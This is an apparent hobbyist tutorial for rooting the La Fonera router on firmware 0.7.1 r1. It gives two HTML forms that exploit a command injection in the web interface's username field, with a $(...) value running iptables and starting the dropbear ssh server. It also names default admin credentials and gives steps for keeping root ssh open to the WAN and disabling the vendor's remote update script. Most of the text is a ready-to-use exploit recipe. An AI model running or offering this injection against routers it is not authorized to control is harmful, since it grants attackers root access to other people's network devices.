Hacking La Fonera
This is the original article where I found this recipe.
This hack was tested on La Fonera with firmware 0.7.1 r1. The web interface is vulnerable to a code injection, we will use it to open the internal firewall and to gain access to the TCP port 22 (ssh).
Suppose that La Fonera is reachable via Ethernet at the address 169.254.255.1, we write two html forms on our PC and submit them using the browser. When La Fonera ask you to authenticate, use the default login/password: admin / admin. The first step will open the port 22 on the firewall:
<html> <head></head><body><center> <form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data"> <input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" /> <input type="submit" name="submit" value="Submit" /> </form> </center></body></html>
The second step will start the ssh server dropbear (allow several seconds to let the program start):
<html> <head></head><body><center> <form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data"> <input name="username" value="$(/etc/init.d/dropbear)" size="68" ><input type="submit" name="submit" value="Submit" /> </form> </center></body></html>
Now you can enter La Fonera via ssh with root/admin.
Mantain ssh access after reboot
To keep the ssh server running and the port 22 open after a reboot, do the following:
root@OpenWrt:/#mv /etc/init.d/dropbear /etc/init.d/S50dropbear
Edit /etc/firewall.user
and decomment the following lines:
### Open port to WAN ## -- This allows port 22 to be answered by (dropbear on) the router iptables -t nat -A prerouting_rule -i $WAN -p tcp --dport 22 -j ACCEPT iptables -A input_rule -i $WAN -p tcp --dport 22 -j ACCEPT
Edit /bin/thinclient
and comment-out the last line, where the downloaded script is executed. Add a line to save the script each time it is downloaded (remember to delete them periodically, to save space):
# . /tmp/.thinclient.sh cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%H')